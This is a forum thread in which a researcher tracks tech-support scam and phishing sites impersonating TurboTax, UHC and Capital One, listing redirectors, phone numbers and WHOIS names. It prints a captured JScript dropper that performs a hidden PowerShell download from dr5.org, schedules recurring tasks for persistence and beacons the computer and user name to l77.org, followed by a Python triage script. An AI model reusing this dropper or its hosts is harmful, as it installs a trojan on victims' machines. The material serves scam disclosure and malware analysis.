Now some news: the redirector has changed its target to https://activation.begin.rest/turbotax/
I reported this multi-scam website here:
suspecting that it was a Web InfoTech property. Now there is more evidence.
Another thing, kind of a puzzle:
A bunch of this scam group's impersonation web sites share this "DG" logo
as a favicon and/or elsewhere. It never seems related to the supposed topic of the website (TurboTax, HBO Max, Fidelity Investments…)
What does DG stand for? Is it a clue?
Guess what? This same number is also the "support" number for the Microsoft mobile phone linking scheme
Phishing page https://akas.prinset.shop/
inevitably leads to the fake error page Phone Link
Associated tawk.to account https://tawk.to/chat/65182c27e6bed319d0048030/1hbj6oupp
These scammers are hungry: put your phone number in the form on the phishing page and Peter Mam or one of his fellow Support Executives will call you right away on a Saturday. I got a call from Peter Mam on 856-212-1306.
I submitted the phishing page. Sunday.
Here's what I think is another piece of their Internet infrastructure.
Take for example this fake TurboTax page https://installtaxturbo.com/install-turbotax-with-license-code/
It links to the site Download & Install TurboTax® Desktop 2024-2025, which I've noted as a suspected Web Infotech property in a couple of other threads, via a redirecting domain, "ww0.us."
See Fake HP Printer scammer websites - #10 by ElmerFudde2020 for another example.
Now, for the redirection to work, an HTTP parameter has to be passed to ww0.us (after the "?" in the URL). The usual parameters I've seen seem to be base64-encoded URLs.
However, what about a sort of default or dummy parameter? Is there a default or fallback response?
What if we tried https://ww0.us/?I_AM_A_SCAMMER ?
Guess where it redirects to?
More on ww0.us: Currently Whois records say the domain is administered by a "Roger Watts" at a very modest residential address in New Jersey (I'm not going to post the exact address because there's a good chance it's fake and whoever lives there has nothing to do with this).
Registered admin email [email protected] is also the admin for two obvious phishing domains, both registered in January of this year:
https://activateuhccom.us/ and https://activateuhc.us/ , both pretending to be United Healthcare, and both of which are probably more scammy than the real UHC, which is hard to beat.
The link on the second address uses the ww0.us redirector/obfuscator!
aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== is just the originating URL, https://activateuhc.us , in base64.
It redirects to, where else?, a subdirectory of activation.begin.support: setup your activate.uhc.com (it will return a dummy page unless you access it through the phishing redirector link).
And of course there's an error, why not! setup your activate.uhc.com
New toll-free number: 855-222-8365. I get the standard "blacklisted" message that I get from Web Infotech numbers when I call from my main research phone.
But wait, there's more. Up until December 26 of last year, ww0.us was owned by a Salman Khan of Rajasthan, email [email protected] (cool email address, Salman!). The other domain registered to that address is a very suspicious https://youtube.gs/
*Note: Salman Khan is the name of a famous Bollywood actor, probably not the same guy! And quite likely not even a real name for one of our scammers, just a little joke from them.
I think the link is changed now!
New website: tx.newredir.com now redirects to Download & Install TurboTax® Desktop 2024-2025.
So over the course of the month this multi-scam website has moved from activation.begin.rest to activation.begin.support to activation.begin.lat.
If your browser user-agent is set to Chrome on Android, tx.newredir.com once again redirects to https://ts.activatetax.pro/Installation-Error-Contact-Support.php . Probably works for some other browser user agent combos. New toll-free phone number: 855-531-2626.
Via a Google search I found another subdirectory of this multi-scam site. This one doesn't seem to check for referrer, user-agent or HTTP parameters.
A new domain I discovered today
The Google Sites page Activate my Capital One card online at Activate.capitalone.com links to
If the browser user agent is a mobile phone variety, it redirects to
https://activation-support.tax-com.com/capitalone/enter-code.php
with the error page https://activation-support.tax-com.com/capitalone/authentication-error.php
New toll-free number: 866-593-3778.
Here's a spam post that's a catalogue of related phishing sites, including other subdomains of tax-com.com:
(copy archived at web.archive.org: installturbotax | Players list | Bandori Party - BanG Dream! Girls Band Party)
And today this page has another new toll-free number: 855-613-0464.
New toll-free number spotted today: 855-668-8507.
New website and new phone number. The redirect yields the scamming page for Safari/iOS (but oddly, not Chrome/Android).
https://activation-support.tellmenew.com/capitalone/authentication-error.php
855-619-8688
866-217-2243 is active again at https://myefiling.online//Installation-Error-Contact-Support.php .
Update later the same day: a new toll-free number, 855-923-3385.
In other news, the old redirecting site tx.newredir.com seems to have finally gone down (for now?) and all their thousands of SEO spam feeder pages are being updated with a new intermediate domain, ts.remdos.com, e.g. Installturbotax.com. Registrar is AppCroNix Infotech Private Limited, d/b/a VEBONIX.com, registered just five days ago.
Update on this: with my browser user agent set to MS Edge on Windows, activateuhc.us directs me via ww0.us to a new phishing domain, setup your activate.uhc.com . After entering my (fake) info, the form sends me to this page:
Which prompts me to download and install a zip-compressed EXE file and run it! Wow, that can't be good. Anyone want to do some analysis on the file?
The parent domain freetechsupport.org returns a bare-bones ātech supportā website with a phone number: 856-240-0005.
Google says 856-240-0005 is also the number for:
So the "EXE" file is not actually a binary file but some kind of PowerShell thing that downloads from various URLs; still very malicious!
// Stage 1: Windows Script Host objects for writing files and running commands
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
// update.bat: a hidden PowerShell download of "in.mp3" (not audio; see below), saved as backup.bat
var updateBatContent = "@echo off\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
// Persistence: daily scheduled tasks under the current user; "echo N" answers any confirmation prompt
function createScheduledTask(taskName, taskTime, taskPath) {
    var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
    shell.Run("cmd /c echo N | " + command, 0, true);
}
// update.bat re-fetches the payload at 11:05 and 19:05; backup.bat (the payload) runs one minute later
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
// Beacon: opens a URL carrying the computer and user name, so the operators can tell victims apart
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);
So, if you query this URL using a Windows PowerShell user-agent string, you get something that isn't an MP3 file (maybe the extension is to deceive firewalls or antivirus heuristics?) but a Windows shell script. I'm not good at analyzing this but it involves scheduling a bunch of recurring background tasks, and something named Antivirus-Update.bat. Any experts out there who can help decoding this?
I'm trying to paste the code into this comment but I'm getting a "403 error," maybe it's too long or something?
Update: I put the file through hybrid-analysis.com and it says it's the "Trojan.Script.Agent.khixek" aka the AdsExhaust trojan, which supposedly generates fake clicks on pay-per-click ads or something like that?
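As an added defender-side example (not code from this thread, the forum, or the scammers), here is a static triage pass over a JScript dropper shaped like the one quoted above: the constructed sample mirrors its structure with the two download hosts replaced by reserved .invalid placeholders, and the output is the indicator list plus the host checks a responder would run on a suspected victim machine.

```python
import re
from typing import Dict, List

# Constructed sample modelled on the JScript dropper quoted in the thread;
# the two download hosts are replaced with reserved .invalid placeholders.
SAMPLE_DROPPER = r'''
var shell = new ActiveXObject("WScript.Shell");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var updateBatContent = "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://stage1.invalid/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
function createScheduledTask(taskName, taskTime, taskPath) {
  var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /F';
  shell.Run("cmd /c echo N | " + command, 0, true);
}
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
shell.Run("cmd /c start /min http://stage2.invalid/downloading.php?dl=uhc&id=" + computerName + "_" + userName, 0, false);
'''

URL_RE = re.compile(r"""https?://[\w.-]+(?:/[^\s'"]*)?""")
TASK_RE = re.compile(r'createScheduledTask\("([^"]+)",\s*"(\d{2}:\d{2})"')
DROP_RE = re.compile(r'"\\\\([\w-]+\.bat)"')  # "\\name.bat" appended to %LOCALAPPDATA%
ENV_RE = re.compile(r"%([A-Z_]+)%")

def triage_dropper(script: str) -> Dict[str, object]:
    """Static triage of a WSH/JScript dropper (regex only, nothing is executed)."""
    env = set(ENV_RE.findall(script))
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "hidden_download": "-WindowStyle Hidden" in script and "Invoke-WebRequest" in script,
        "scheduled_tasks": [{"name": n.replace("\\\\", "\\"), "time": t}
                            for n, t in TASK_RE.findall(script)],
        "dropped_files": sorted(set(DROP_RE.findall(script))),
        # host and user name baked into a URL: the victim is fingerprinted on first run
        "beacon_fields": sorted(env & {"COMPUTERNAME", "USERNAME"}),
    }

def hunt_queries(findings: Dict[str, object]) -> List[str]:
    """Turn the findings into the checks to run on a suspected victim host."""
    queries = ['schtasks /Query /TN "%s"' % t["name"] for t in findings["scheduled_tasks"]]
    queries += ['dir "%%LOCALAPPDATA%%\\%s"' % f for f in findings["dropped_files"]]
    return queries

if __name__ == "__main__":
    found = triage_dropper(SAMPLE_DROPPER)
    print(found["urls"], found["beacon_fields"], *hunt_queries(found), sep="\n")
```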